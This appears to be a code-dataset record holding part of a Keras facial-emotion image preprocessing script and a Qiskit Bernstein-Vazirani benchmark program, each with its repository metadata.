df = pd.read_csv(path1) # CHANGE ME
base_filename = data_path + "test/" # CHANGE ME
for index, row in df.iterrows():
if (row[' Usage'] == "PublicTest"):
px = row[' pixels']
emot = int(row['emotion'])
emot_loc = self.emotion_dict[emot]
filename = base_filename + emot_loc
img = self.createPixelArray(px)
img_arr = self.augmentIMG(img, task)
idx = 0
for i in img_arr:
num = str(index) + "_" + str(idx)
idx +=1
saveIMG(i, num, filename)
def createEmotionDict(self,):
emotionDict = {}
emotionDict[0]="angry/"
emotionDict[1]="disgust/"
emotionDict[2]="fear/"
emotionDict[3]="happy/"
emotionDict[4]="sad/"
emotionDict[5]="surprise/"
emotionDict[6] = "neutral/"
return emotionDict
def createSimpleData(self,):
self.cleanAll()
print("Cleaning done")
emot_dict = self.createEmotionDict()
self.createTrain(1)
print("Training Data Generation done")
self.createTest(1)
print("Testing Data Generation done")
def createComplexData(self,):
self.cleanAll()
emot_dict = self.createEmotionDict()
self.createTrain(emot_dict, 3)
self.createTest(emot_dict, 3)
def preprocess_fn(self, img):
""" Preprocess function for ImageDataGenerator. """
img = img / 255.
return img
def get_data(self, path, shuffle):
""" Returns an image data generator which can be iterated
through for images and corresponding class labels.
Arguments:
path - Filepath of the data being imported, such as
"../data/train" or "../data/test"
shuffle - Boolean value indicating whether the data should
be randomly shuffled.
Returns:
An iterable image-batch generator
"""
data_gen = tf.keras.preprocessing.image.ImageDataGenerator(preprocessing_function=self.preprocess_fn)
# VGG must take images of size 224x224
img_size = hp.img_size
classes_for_flow = None
# Make sure all data generators are aligned in label indices
if bool(self.idx_to_class):
classes_for_flow = self.classes
# Form image data generator from directory structure
data_gen = data_gen.flow_from_directory(
path,
target_size=(img_size, img_size),
class_mode='sparse',
batch_size=hp.batch_size,
shuffle=shuffle,
classes=classes_for_flow)
# Setup the dictionaries if not already done
if not bool(self.idx_to_class):
unordered_classes = []
for dir_name in os.listdir(path):
if os.path.isdir(os.path.join(path, dir_name)):
unordered_classes.append(dir_name)
for img_class in unordered_classes:
self.idx_to_class[data_gen.class_indices[img_class]] = img_class
self.class_to_idx[img_class] = int(data_gen.class_indices[img_class])
self.classes[int(data_gen.class_indices[img_class])] = img_class
return data_gen
|
[
"natalie_rshaidat@brown.edu"
] |
natalie_rshaidat@brown.edu
|
2701c269f7ccc8bd889ed6aafc49b1be6127a794
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/p3BR/R1/benchmark/startQiskit_Class305.py
|
5f8ebb32204cb0db962ae68cdf9fa47b28ced1cb
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998
| 2021-09-19T02:56:16
| 2021-09-19T02:56:16
| 405,159,939
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,321
|
py
|
# qubit number=3
# total number=57
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.rx(-0.09738937226128368,input_qubit[2]) # number=2
prog.h(input_qubit[1]) # number=33
prog.cz(input_qubit[2],input_qubit[1]) # number=34
prog.h(input_qubit[1]) # number=35
prog.h(input_qubit[1]) # number=3
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
sample_shot =4000
writefile = open("../data/startQiskit_Class305.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = BasicAer.get_backend('statevector_simulator')
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
|
[
"wangjiyuan123@yeah.net"
] |
wangjiyuan123@yeah.net
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.